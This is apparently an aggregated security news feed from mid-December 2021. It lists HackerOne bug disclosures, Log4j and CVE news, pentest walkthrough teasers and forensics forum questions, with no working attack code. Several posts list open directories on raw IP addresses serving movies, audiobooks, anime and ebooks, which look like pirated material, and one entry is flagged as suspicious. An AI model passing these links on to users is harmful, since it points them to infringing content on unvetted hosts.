    Reddit disclosed a bug submitted by cracker922: https://hackerone.com/reports/1425884
    Untitled
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/584582 - Bounty: $500
    reflected xss in e.mail.ru
    Mail.ru disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1379297 - Bounty: $1000
  • Open

    A collection of gifs
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-15 Review
    《软件分析》完整版课程视频 by ourren 从Log4shell事件看资产风险运营工程化的困局与盲点 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Intro to Bitcoin investigation and wallet seizure - types of wallets, seeds, keys, and transactions
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    A TL;DR technical explanation of the log4j vulnerability
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
  • Open

    【安全通报】微软12月漏洞补丁日修复多个高危漏洞
    近日,微软发布 12 月份安全补丁,共修复了 67 个针对微软产品的CVE漏洞,其中 7个严重漏洞,60个高危漏洞。涉及 Windows 和 Windows 组件、ASP.NET Core 和 Vis...  ( 2 min )

  • Open

    CISA Log4j (CVE-2021-44228) Vulnerability Guidance
    Article URL: https://github.com/cisagov/log4j-affected-db Comments URL: https://news.ycombinator.com/item?id=29559856 Points: 24 # Comments: 0  ( 2 min )
    CVE in Apache Log4j 2.15.0 was incomplete in certain non-default configurations
    Article URL: https://www.cve.org/CVERecord?id=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29558106 Points: 2 # Comments: 0
    Separate Log4j DOS Vulnerability – CVE-2021-45046
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29556414 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-4102: RCE in Chromium actively being exploited
    Article URL: https://security.archlinux.org/CVE-2021-4102 Comments URL: https://news.ycombinator.com/item?id=29555514 Points: 9 # Comments: 0
    CVE-2021-45046: Apache Log4j2 2.16.0 is out
    Article URL: https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f Comments URL: https://news.ycombinator.com/item?id=29554725 Points: 10 # Comments: 1
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Levels of Fuzzing (2013)
    Article URL: https://blog.regehr.org/archives/1039 Comments URL: https://news.ycombinator.com/item?id=29556976 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Tips for DFIR Analysts, pt VI
    Context & Finding Persistence I was looking into an unusual mechanism for launching applications recently, and that research brought back a recurring issue I've seen time and again in the industry, specifically pivoting from one data point to another based on knowledge of the underlying system. Very often, during SOC monitoring or live response, we'll find a process executing via EDR telemetry (or some other means) and have no clear understanding of the mechanism that launched that process. Sometimes, we may have the data available to assist us in discovering the root cause of the process launch; for example, in the case of processes launched via web shell, all you need to do is trace backward through the process tree until you get to the web server process (i.e., w3wp.exe, etc.). Other ti…  ( 6 min )
  • Open

    Any good tools for forensic analyzing a MariaDB?
    Dear community, What would you use to analyze a MariaDB forensically? I found https://github.com/pr4xx/db-forensic-framework on GitHub but would like to hear what you are using? Anything helps, thank you submitted by /u/Civil-Lion-4602 [link] [comments]  ( 1 min )
    I'm currently studying to transition from a SIEM administrator to a network forensics analyst. What's are good workflows/resources for analyzing PCAPs?
    Hey community, 24 years old SIEM administrator who's currently self-studying to become a network forensics analyst. I'm reading books/watching youtube videos/doing some SANS and Chris Sanders courses but I want to hear from the subreddit - what's a good workflow or some tips when starting to analyze PCAPS? I have a lab with Brim, Suricata, and Snort that I play with. Assuming I'm tasked with analyzing a PCAP that is related to an incident of some sort, what would be good pointers and procedures to follow? what would be things that I would want to look for, and how do I find them? Thanks in advance! submitted by /u/HeliosHype [link] [comments]  ( 2 min )
    Are books in the FAQ still relevant?
    Some of them are from 2009 to 2013. Can anyone suggest more recent books? Or are those books still the best? Also what CTF website do you recommend specified for digital forensics ? submitted by /u/NinjaShmurtle [link] [comments]  ( 2 min )
    Recommendations for Targeted Diff Searches
    I’m looking to cross reference forensic data dumps from two different devices. Are there any tools (preferably open source) that can compare file contents between two different folders and print matching values? submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-14 Review
    浅谈被动式IAST产品与技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    Gaining access to a network with Office macros — Pentesting and red teaming
    Explaining the usage of malicious Office macros to gain access to a target’s network as a red teamer. Continue reading on Medium »  ( 3 min )
  • Open

    Am I getting ghosted by MITRE ?
    Hello there, I sent a request for some CVEs last week (on Thursday) to MITRE - CNA, for some bugs that I found in an open-source project, the bugs have been aknowledged by the vendor and patched. It's Tuesday today and aside from the automated email right after the request they didn't come back to me. Is this normal? Does it take usually that long ? submitted by /u/Glum_Gur2093 [link] [comments]  ( 1 min )
  • Open

    Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
    Aiven Ltd disclosed a bug submitted by j0v: https://hackerone.com/reports/1415820 - Bounty: $1000
    Universal Cross-Site Scripting vulnerability
    Proctorio disclosed a bug submitted by sector7-nl: https://hackerone.com/reports/1326264
  • Open

    Audiobooks, podcasts & tutti quanti
    http://120.29.58.149:8888/Audiobooks/ http://51.198.90.160/resources/AudioBooks/ http://173.208.202.90:8080/audiobooks/Martin%2C%20George%20R.%20R.%20-%20A%20Clash%20of%20Kings http://27.32.91.221/Audiobooks/ (Movies, TV shows and music in other dirs) http://www.vicenet.org/book/Lifespan%20Why%20We%20Age%20-%20and%20Why%20We%20Don't%20Have%20To/ http://67.82.39.229:88/DandD/Audio/Chris%20Perkins%20DM/ (including D&D stuff) http://winnow.veeshanvault.org/files/Audio/ Podcasts: http://teknosophy.com/episodes/ German podcasts on OSS: http://159.69.132.234/ submitted by /u/krazybug [link] [comments]  ( 2 min )
    WikiLeaks - Can Anyone Confirm New Data Dumped Tonight?
    submitted by /u/Aphix [link] [comments]

  • Open

    [dubsmash] Username and password bruteforce
    Reddit disclosed a bug submitted by asce21: https://hackerone.com/reports/1165225 - Bounty: $100
    com.reddit.frontpage vulernable to Task Hijacking (aka StrandHogg Attack)
    Reddit disclosed a bug submitted by nexus2k: https://hackerone.com/reports/1325649
    [dubsmash] Long String in 'shoutout' Parameter Leading Internal server Error on Popular hastags , Community and User Profile
    Reddit disclosed a bug submitted by sandeep_rj49: https://hackerone.com/reports/1237428 - Bounty: $1000
    No Rate limit on change password leads to account takeover
    Reddit disclosed a bug submitted by dreamispossible: https://hackerone.com/reports/1165285
    Vulnerabilities in exported activity WebView
    Shipt disclosed a bug submitted by shell_c0de: https://hackerone.com/reports/414101 - Bounty: $350
    Error Page Content Spoofing or Text Injection
    Judge.me disclosed a bug submitted by tefa_: https://hackerone.com/reports/1421413
  • Open

    Through the years..Movies,TV, Software, etc...
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
    Christmas movies and other Christmas stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    The first list contains mostly PDF and EPUB files. The second is a list of questionable/unexplored/interesting directories.
    Plus an appreciation repost for this post about Calishot and the terabytes of data being hosted. Adding NSFW flare for the unexplored directories, and for the nature of https://ihatefeds.com ‘s content. PDFs: https://lira.epac.to/DOCS-TECH/Security/ https://lira.epac.to/DOCS-TECH/ https://www.miralishahidi.ir/resources/ https://www.kgay4all.com/seioqueseiporleroqueleio/ https://theswissbay.ch/pdf/ http://index-of.es http://s28.bitdl.ir/?C=N&O=A -(edit)-a lot of files with the same size and overall feels a bit sus. Proceed with extra caution. https://ihatefeds.com http://www.aetkin.com/files/Real%20Analysis%20Qual%20Study%20Questions/ http://mis.kp.ac.rw/admin/admin_panel/kp_lms/files/digital/ http://incompleteideas.net/book/ Questionable directories https://ebook-mecca.com/ebooks/?SA http://47.219.34.42:8081/Files/ -(edit)-I think he’s dead, Jim. https://docs.spring.io/spring-amqp/docs/ https://docs.jboss.org/weld/reference/ https://www.scons.org/doc/ https://www.unicode.org/Public/ https://www.unicode.org/Public/UCD/latest/charts/ https://ftp.rush.edu/users/molebio/ https://www.nsula.edu/documentprovider/docs/ https://spdf.gsfc.nasa.gov/pub/software/cdf/doc/ https://bannerwitcoff.com/wp-content/uploads/ https://www.uvm.edu/~swac/docs/ http://ftp.axis.com • https://www.orfeo-toolbox.org/packages/ci/CookBook/ Directory- https://www.orfeo-toolbox.org/packages/ci/ submitted by /u/Ok_Strawberry7053 [link] [comments]
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Imaging Software
    What freeware beside Paladin do you use for imaging after booting? Any suggestions? submitted by /u/Civil_Structure_1033 [link] [comments]  ( 1 min )
    Diavol Ransomware
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )
  • Open

    Finding the log4j RCE With Fuzzing
    Article URL: https://www.code-intelligence.com/blog/java-fuzzing-log4j-rce Comments URL: https://news.ycombinator.com/item?id=29541779 Points: 1 # Comments: 1  ( 1 min )
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki周刊(第406期) by ourren 从一例挖矿木马看 Log4Shell 的在野传播 by Avenger 更多最新文章,请访问SecWiki
  • Open

    【安全通报】Apache Log4j2 远程代码执行漏洞
    近日,网络上出现 Apache Log4j2 远程代码执行漏洞。攻击者可利用该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及...  ( 4 min )
  • Open

    Can we find Log4Shell with Java Fuzzing? 🔥 (CVE-2021-44228 - Log4j RCE)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Monitoring events through the OSINT system to ensure the information security of the organization
    Today OSINT (Open Source Intelligence) term is used in different aspects. Continue reading on Medium »  ( 5 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    如何使用 X.XYZ 铸造和交易您的 NFT
    x.xyz是一个几乎零gas的NFT交易平台,X运行在fantom网络上,所以 Continue reading on Medium »  ( 2 min )

  • Open

    HackMyVM — Furious
    Writeup (Español) Continue reading on Medium »  ( 3 min )
  • Open

    Finding a deleted file without having a file name
    tldr; need to find a file that may or may not have been on 3 separate windows PCs. only definitive info i have is the file itself, which is a pdf of a scanned document. file was deleted 2019 and removed from recycle bin. hey all not sure where to start here, hoping someone can point me in the right direction. ive got a pdf file of a scanned document. that is all i know about the file. not sure if the name would have been changed, if it was originally a .docx, nothing. my first question is how to find it if it isnt deleted? i opened it up in notepad, grabbed a unique string from the file and then searched using 'Everything' (voidtools) but it was hit or miss as to if it found it 2nd question is how to find it if it was deleted. the file dates back to 2019 and these computers are used on a daily basis, so im not very hopeful the data wouldnt have been overwritten by now. ​ thanks in advnace submitted by /u/mat7688 [link] [comments]  ( 2 min )
    Biggest dreams in the field?
    Something a little different. What do you hope to accomplish in your career? Opening up your own firm? New research? I am just curious. submitted by /u/FAlady [link] [comments]  ( 1 min )
    Mobile phone and MacOS forensic tools
    I’m going to be attending SANS DFIR netwars and I’m confident everywhere except smartphones and macOS. I know we’ll be given apple hfs/apfs and iOS and android acquisitions which I’m not sure how to even approach. So was wondering if anybody had some good resources on how to tackle them submitted by /u/KennethsFreq [link] [comments]  ( 1 min )
  • Open

    A galore of animated movies, series and anime to prepare your Christmas time in family
    http://109.120.203.163/lvm/animation%20and%20puppets/ http://185.141.213.228/Animation/ https://185.107.32.136/Animation/ http://tajmovie.ir/Animation/ https://dl1.zflix.ir/Animation/ https://dl3.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ https://dl1.fastmovie.ir/Movie/Animation/ https://dl5.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ http://46.4.39.111/--KIDS-SERIES/ Anime: http://75.86.210.23/archive/ANIMU/ http://neet.rehab/anime/ == https://149.28.180.59/anime/ http://51.158.151.61:8080/Animoos/ http://148.251.73.149/Anime&Manga/ http://149.28.180.59/anime/ http://149.28.180.59/anime/ http://509.rbx.abcvg.ovh/ submitted by /u/krazybug [link] [comments]  ( 4 min )
  • Open

    Exploit samAccountName spoofing with Kerberos
    submitted by /u/dmchell [link] [comments]
  • Open

    add class vulnerable Stored XSS
    Mail.ru disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1215179

  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    RXSS - http://macademy.mtnonline.com
    MTN Group disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/1091165
    Missing captcha and rate limit protection in help form
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1165223
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #1
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397601 - Bounty: $3000
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #2
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397602 - Bounty: $3000

  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post show how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    Go 1.18 ile Neler Geliyor?
    2022 yılının ilk çeyreğinde yayınlanması planlanan Go 1.18 versiyonuyla birlikte bizleri birçok yeni özellikler bekliyor. Continue reading on Medium »  ( 2 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    Go 1.18 ile Neler Geliyor?
    2022 yılının ilk çeyreğinde yayınlanması planlanan Go 1.18 versiyonuyla birlikte bizleri birçok yeni özellikler bekliyor. Continue reading on Medium »  ( 2 min )
  • Open

    Trivial RCE in log4j
    submitted by /u/dfv157 [link] [comments]
    Evasion Adventures
    submitted by /u/grandstream [link] [comments]
  • Open

    Looking for career advice
    Please remove this if it doesn't fit in with this sub, I'm asking here because this seems to be the most common place to discuss appsec. A little about myself: I'm currently working in a helpdesk role in Australia and have been practicing both offensive netsec and web application security/exploit dev for a little while. I like both netsec and appsec but netsec bores me a little bit and I really enjoy coding/learning about applications and exploiting them. The issue I'm having is that helpdesk work seems to line up nicely with network pentesting, and I don't have a degree or any development experience. But with that said I'd really enjoy doing application security as a career. Does anyone have any advice in regards to entering the application security world from a support role? Or would it be better for me to pursue network security and then try to switch to application security later? Also should I pursue any certs that might help? I've thought about OSWE in the future. Any advice would be great, and again if this post doesn't belong here I can delete. Thanks. submitted by /u/n3v327311 [link] [comments]  ( 2 min )

  • Open

    Endpoint without access control leads to order informations and status changes
    Azbuka Vkusa disclosed a bug submitted by cabelo: https://hackerone.com/reports/1050753 - Bounty: $1000
    Misconfiguration Certificate Authority Authorization Rule
    Sifchain disclosed a bug submitted by d4rk_r0s3: https://hackerone.com/reports/1186740
    Linux Desktop application "sifnoded" executable does not use Pie / no ASLR
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188633
    CORS (Cross-Origin Resource Sharing) origin validation failure
    Sifchain disclosed a bug submitted by 11holefinder: https://hackerone.com/reports/1192147
    Vulnerability : Email Spoofing
    Sifchain disclosed a bug submitted by tajammul: https://hackerone.com/reports/1180668
    No valid SPF record found
    Sifchain disclosed a bug submitted by tamilarasi11: https://hackerone.com/reports/1187001
    Username disclosure at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188662
    Design Issues at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188652
    No Rate Limit in email leads to huge Mass mailings
    Sifchain disclosed a bug submitted by sudhakarsurya: https://hackerone.com/reports/1185903
    Information Disclosure at one of your subdomain
    Sifchain disclosed a bug submitted by omemishra: https://hackerone.com/reports/1195423
    Sifchain Privacy Policy Webpage Uses Wordpress Default Template. Does Not Display Correct Privacy Policy.
    Sifchain disclosed a bug submitted by masq31: https://hackerone.com/reports/1196049
    Clickjacking /framing on sensitive Subdomain
    Sifchain disclosed a bug submitted by ilxax1: https://hackerone.com/reports/1195209
    No Valid SPF Records at sifchain.finance
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188725
    Session Token in URL
    Sifchain disclosed a bug submitted by little_one: https://hackerone.com/reports/1197078
    CSRF in newsletter form
    Sifchain disclosed a bug submitted by ph0b0s: https://hackerone.com/reports/1190705
    Wrong Implementation of Url in https://docs.sifchain.finance/
    Sifchain disclosed a bug submitted by sar00n: https://hackerone.com/reports/1198877
    Wrong Url in Main page of sifchain.finance
    Sifchain disclosed a bug submitted by beebeek: https://hackerone.com/reports/1195512
    Clickjacking at sifchain.finance
    Sifchain disclosed a bug submitted by manjithgowthaman: https://hackerone.com/reports/1212595
    clickjacking vulnerability
    Sifchain disclosed a bug submitted by sravani_1234: https://hackerone.com/reports/1199904
    Clickjacking
    Sifchain disclosed a bug submitted by v_t: https://hackerone.com/reports/1206138
    information disclosure
    Sifchain disclosed a bug submitted by virus26: https://hackerone.com/reports/1218784
    Possible Database Details stored in values.yaml
    Sifchain disclosed a bug submitted by sparta5537: https://hackerone.com/reports/1199803
    Sifchain token leak
    Sifchain disclosed a bug submitted by abdullah321: https://hackerone.com/reports/1188938
    ETHEREUM_PRIVATE_KEY leaked via github
    Sifchain disclosed a bug submitted by bugkillerak: https://hackerone.com/reports/1283605
    4 xss vulnerability dom based cwe 79 ; wordpress bootstrap.min.js is vulnerable
    Sifchain disclosed a bug submitted by rao_ji1hackerone: https://hackerone.com/reports/1219002
    Signature Verification /// golang.org/x/crypto/ssh
    Sifchain disclosed a bug submitted by dpredrag: https://hackerone.com/reports/1276384
    Origin IP Disclosure Vulnerability
    Sifchain disclosed a bug submitted by uniquekamboj6738: https://hackerone.com/reports/1327443
    Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.
    Sifchain disclosed a bug submitted by 0xcachefl0w: https://hackerone.com/reports/1187816
    Email Spoofing bug
    Sifchain disclosed a bug submitted by niloychowdhury3: https://hackerone.com/reports/1176090
    [34.96.80.155] Server Logs Disclosure lead to Information Leakage
    Evernote disclosed a bug submitted by huntinex: https://hackerone.com/reports/1398270 - Bounty: $150
    Exposed kubernetes dashboard
    8x8 disclosed a bug submitted by bugkill3r: https://hackerone.com/reports/1418101

  • Open

    State of the Subreddit #3
    Greetings everyone in r/asknetsec, I hope everyone is doing well and getting ready for the holidays. All the moderators here wish you a relaxing and safe time with your families and friends. Hopefully we all will get a breather from the crazy world of Cyber Security and Networking. A couple of updates right off the bat – We’ve noticed an uptick in traffic for the subreddit over the past couple of months. Page views are up roughly 35% since the all-time lows of June-July when the subreddit was locked from the original admin. We are very happy with the increase, as it allows more collaboration and questions to be answered. Survey requests are no longer accepted on the subreddit going forward. We had a bit of a conversation internally on this topic as they seem to come up once or twice a week. Usually these are from college students requesting information for a class or study. We wish to continue and help anyone in school to best of our ability, but most of the time these surveys results are not shared publicly, and only benefit the survey creator. Due to this we don’t see it beneficial to include them. We’ve added surveys to rule 2 of what is relevant to the subreddit. Going into the new year, we hope to start providing everyone with some AMAs from verified industry professionals. We’ve been talking about this internally for a bit. State of the subreddit posts will most likely continue once every quarter (3 months). Thanks to everyone for continuing to contribute to the subreddit and continuing to report posts that break the rules. Even if you are unsure, your reports are appreciated. Have a fantastic holiday, and if you need anything, don’t hesitate to reach out to us directly. -AskNetSec Mod Team submitted by /u/Envyforme [link] [comments]  ( 1 min )
  • Open

    Process Ghosting - EDR Evasion
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    FIN13: A Cybercriminal Threat Actor Focused on Mexico
    submitted by /u/dmchell [link] [comments]
    Multiple Vulnerabilities in AWS and Other Major Cloud Services
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    [Transportation Management Services Solution 2.0] Improper authorization at tmss.gsa.gov leads to data exposure of all registered users
    U.S. General Services Administration disclosed a bug submitted by alexandrio: https://hackerone.com/reports/1175980
    php info file and sql backup at vendor's subdomain
    Semrush disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1358249 - Bounty: $200
    Account Takeover through registration to the same email address
    QIWI disclosed a bug submitted by avolume: https://hackerone.com/reports/1224008 - Bounty: $100
    [allods.mail.ru] - WebCache Poisoning Host Header lead to Potential Stored XSS
    Mail.ru disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1262408

  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    CORS origin validation failure
    UPchieve disclosed a bug submitted by jupiter-47: https://hackerone.com/reports/1404986
    Authentication Bypass - Email Verification code bypass in account registration process.
    UPchieve disclosed a bug submitted by anas_44: https://hackerone.com/reports/1406471
    Bypass a fix for report #708013
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1363672 - Bounty: $3500
    Guard WKS lookup: Evil WKS server forces connections to last forever
    Open-Xchange disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1016691 - Bounty: $444
    Blind XSS
    Rocket.Chat disclosed a bug submitted by cyberasset: https://hackerone.com/reports/1091118
  • Open

    【安全通报】Grafana 未授权任意文件读取 0day 漏洞
    近日,网络上出现 Grafana 未授权任意文件读取的 0day 漏洞,漏洞细节暂未公开。攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。  ( 1 min )
  • Open

    WHY fuzzers MISSED this buffer-overflow in Mozilla NSS library? 🤦‍♂️ (CVE-2021-43527 explained)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Suspected Russian Activity Targeting Government and Business Entities Around the Globe
    submitted by /u/dmchell [link] [comments]
  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion
    Evernote disclosed a bug submitted by neolexsecurity: https://hackerone.com/reports/1189367 - Bounty: $5000
    IDOR to view order information of users and personal information
    Affirm disclosed a bug submitted by xfiltrer: https://hackerone.com/reports/1323406 - Bounty: $500
    xss is triggered on your web
    Shopify disclosed a bug submitted by jaka_tingkir: https://hackerone.com/reports/1121900 - Bounty: $2900
    [h1-2102] Wholesale - CSRF to Generate Invitation Token for a Customer and Move Customer to Invited Status
    Shopify disclosed a bug submitted by rhynorater: https://hackerone.com/reports/1091209 - Bounty: $500
  • Open

    Detection and Response for Linux Reflective Code Loading Malware— This is How
    submitted by /u/elixirelixir [link] [comments]
    Reflective Code Loading in Linux — A New Defense Evasion Technique in MITRE ATT&CK v10
    submitted by /u/elixirelixir [link] [comments]
  • Open

    How is timeless debugging ( reverse debugging ) good? Insight needed
    Any statistical data would be really appreciated. Thanks in advance. submitted by /u/h3ll0-fr13nd [link] [comments]  ( 1 min )

  • Open

    Invoke-PSImage PowerShell Class Project
    A partner and I are in charge of creating a class exercise to show examples of steganography and potential malware. With some research, we discovered Invoke-PSImage on GitHub (GitHub Link). We want to just show how to first input a secret message via steganography with PowerShell and then show how you can input "safe" malware like opening a youtube link from opening the image. So far it isn't working and online tutorials haven't been much help. Does anyone have any experience with this module or know of any other tools that we could use? It is also due tonight 😂 submitted by /u/zacattac1 [link] [comments]  ( 1 min )
  • Open

    Recaptcha Secret key Leaked
    Paragon Initiative Enterprises disclosed a bug submitted by kashifinfo90: https://hackerone.com/reports/1416665
    Authenticated kubernetes principal with restricted permissions can retrieve ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by libio: https://hackerone.com/reports/1249583 - Bounty: $2500
    Staff can use BULK_OPERATIONS_FINISH webhook topic using Graphql without permissions all
    Shopify disclosed a bug submitted by yinvi777: https://hackerone.com/reports/1350095 - Bounty: $600
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )

  • Open

    reflected xss on the path m.tiktok.com
    TikTok disclosed a bug submitted by semsem123: https://hackerone.com/reports/1394440 - Bounty: $1000
    IDOR the ability to view support tickets of any user on seller platform
    TikTok disclosed a bug submitted by lewaperbb: https://hackerone.com/reports/1392630 - Bounty: $2500
    [h1-2102] [Yaworski's Broskis] Suspected overcharge and chargebacks in PoS
    Shopify disclosed a bug submitted by c0rv4x: https://hackerone.com/reports/1089978 - Bounty: $500
    access to stack memory beyond array boundaries
    Open-Xchange disclosed a bug submitted by ihsinme: https://hackerone.com/reports/796555 - Bounty: $400
    File System Monitoring Queue Overflow
    ownCloud disclosed a bug submitted by ihsinme: https://hackerone.com/reports/881891
    Ability to add address without being an admin or staff in the store via wholesale store
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1279322 - Bounty: $500
    Unathorised access to admin endpoint on plus-website-staging5.shopifycloud.com
    Shopify disclosed a bug submitted by j0j0: https://hackerone.com/reports/1394982 - Bounty: $2900
  • Open

    Dynamic instrumentation of a C binary
    I am (a Frida noob) trying to write a script for Frida to capture and modify variables inside a C function. The code for my binary looks like this: int myfunc(int dummy) { return --dummy; } int main () { ... printf("%d\n", myfunc(15)); return 0; } My javascript looks like this: var myfunc_ptr = Module.findExportByName(null, "myfunc") Interceptor.attach(myfunc_ptr, { onEnter: function(args) { const source_string = args[0].readUtf8String(); console.log(source_string); args[0].writeUtf8String("999"); }, onLeave: function(retval) { // by now do nothing. } }) But it fails to update the value. Any help is appreciated ! :) submitted by /u/www_devharsh_me [link] [comments]  ( 1 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    XMGoat - An Open Source Pentesting Tool for Azure - XM Cyber
    submitted by /u/dmchell [link] [comments]

  • Open

    Stored XSS in files.slack.com
    Slack disclosed a bug submitted by oskarsv: https://hackerone.com/reports/827606 - Bounty: $1000
    Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
    Shopify disclosed a bug submitted by cthulhufhtagn: https://hackerone.com/reports/1115139 - Bounty: $500
    CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com
    Glassdoor disclosed a bug submitted by zonduu: https://hackerone.com/reports/1250730 - Bounty: $100
    account takeover through password reset in url https://reklama.tochka.com/
    QIWI disclosed a bug submitted by anonymouus: https://hackerone.com/reports/1379842 - Bounty: $500
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )

  • Open

    Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
    submitted by /u/dmchell [link] [comments]
    Tracking a P2P network related to TA505
    submitted by /u/dmchell [link] [comments]
  • Open

    【安全通报】惠普多功能打印机多个高危漏洞(CVE-2021-3923...
    近日,惠普多功能打印机多个高危漏洞(CVE-2021-39237&CVE-2021-39238)细节公开,惠普官方曾于11月1日发布安全公告。攻击者可利用这些漏洞获取敏感信息、进行远...
  • Open

    Welley Christ is trending as the world’s perfect man and he needs a deal for a record label and…
